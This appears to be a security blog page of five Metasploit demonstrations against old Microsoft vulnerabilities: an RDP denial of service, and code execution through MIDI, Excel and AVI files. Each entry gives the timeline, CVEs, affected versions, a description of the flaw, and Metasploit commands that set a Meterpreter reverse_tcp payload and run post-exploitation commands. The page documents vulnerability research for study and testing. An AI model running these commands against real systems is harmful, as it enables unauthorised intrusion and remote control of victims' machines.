Posts tagged Microsoft

MS12-020 Microsoft Remote Desktop (RDP) DoS Metasploit Demo


Timeline :

Vulnerability found by Luigi Auriemma on 2011-05-16
Vulnerability reported by Luigi Auriemma to ZDI
Vulnerability reported to the vendor by ZDI on 2011-08-24
Coordinated public release of the vulnerability on 2012-03-13
Details of the vulnerability published by Luigi Auriemma on 2012-05-16
Metasploit PoC provided on 2012-03-19

PoC provided by :

Luigi Auriemma
Daniel Godas-Lopez
Alex Ionescu
jduck

Reference(s) :

CVE-2012-0002
MS12-020
ZDI-12-044
OSVDB-80004

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP2
Windows Vista x64 SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based Systems SP1

Tested on Windows XP Pro SP3

Description :

This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw lies in the way the maxChannelIDs field of the T.125 ConnectMCSPDU packet is handled, which results in an invalid pointer being used and therefore causes a denial-of-service condition.

Commands :

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST 192.168.178.22
exploit

MS12-004 Windows Media Remote Code Execution Metasploit Demo


Timeline :

Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability on 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided on 2012-01-27

PoC provided by :

Shane Garrett
juan vazquez
sinn3r

Reference(s) :

MS12-004
CVE-2012-0003
OSVDB-78210

Affected version(s) :

Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based Systems SP1

Tested on Windows XP SP3 with :

winmm.dll 5.1.2600.5512

Description :

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player's ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to exceed the space available on the heap (0x400 bytes allocated by WINMM!winmmAlloc), which then allows a single byte to be modified with either "inc al" or "dec al". This can be used to corrupt an array (CImplAry) we set up and force the browser to confuse types between tagVARIANT objects, which leads to remote code execution in the context of the user. At this time, for the IE 8 target, the JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Commands :

use exploit/windows/browser/ms12_004_midi
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

MS10-038 Office Excel 2002 Overflow Exploit Metasploit Demo


Timeline :

Vulnerability discovered and reported to the vendor by Nicolas Joly
Coordinated release of the vulnerability on 2010-06-08
First exploit provided by abysssec on 2010-09-24
Metasploit PoC provided on 2011-11-21

PoC provided by :

Nicolas Joly
Shahin Ramezany
juan vazquez

Reference(s) :

CVE-2010-0822
OSVDB-65236
MS10-038
MOAUB #24
EDB-ID-15094

Affected version(s) :

Microsoft Office Excel 2002 Service Pack 3 and below
Microsoft Office Excel 2003 Service Pack 3 and below
Microsoft Office Excel 2007 Service Pack 1 and below
Microsoft Office Excel 2007 Service Pack 2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac
Microsoft Office Excel Viewer Service Pack 1 and below
Microsoft Office Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 1
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Excel 2002 (10.2614.2625) SP0

Description :

This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record, an attacker can gain control of the execution flow. This results in arbitrary code execution in the context of the user.

Commands :

use exploit/windows/fileformat/ms10_038_excel_obj_bof
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo


Timeline :

Vulnerability discovered and reported to ZDI by Aniway
Vulnerability reported to the vendor by ZDI on 2010-10-18
Coordinated release of the vulnerability on 2011-04-12
Metasploit PoC provided on 2011-11-05

PoC provided by :

Aniway
abysssec
sinn3r
juan vazquez

Reference(s) :

CVE-2011-0105
MS11-021
ZDI-11-121

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2007 Service Pack 2
Microsoft Office 2010 (32-bit and 64-bit editions)
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office for Mac 2011
Open XML File Format Converter for Mac
Microsoft Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Office Excel 2007 (12.0.4518.014)

Description :

This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the source buffer of a memcpy routine and the number of bytes to copy, causing a stack-based buffer overflow. This results in arbitrary code execution in the context of the user.

Commands :

use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

MS10-026 : Microsoft MPEG Layer-3 Audio Stack Based Overflow Metasploit Demo


Timeline :

Vulnerability discovered by Yamata Li and submitted to Microsoft
Coordinated public release of the vulnerability on 2010-04-13
Metasploit PoC provided on 2011-08-12

PoC provided by :

Yamata Li
Shahin Ramezany
juan vazquez
Jordi Sanchez

Reference(s) :

CVE-2010-0480
OSVDB-63749
MS10-026 (KB977816)

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 and SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista, Windows Vista SP1, and Windows Vista SP2
Windows Vista x64, Windows Vista x64 SP1, and Windows Vista x64 SP2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems SP2

Tested on Windows XP SP3 with :

Internet Explorer 6

Description :

This module exploits a buffer overflow in l3codecx.ax while processing AVI files with MPEG Layer-3 audio content. The overflow only allows overwriting with 0's, so the three least significant bytes of the EIP saved on the stack are overwritten, and the shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note that on IE 8 targets, your malicious URL must be a trusted site in order to load the .NET control.

Commands :

use exploit/windows/browser/ms10_026_avi_nsamplespersec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig
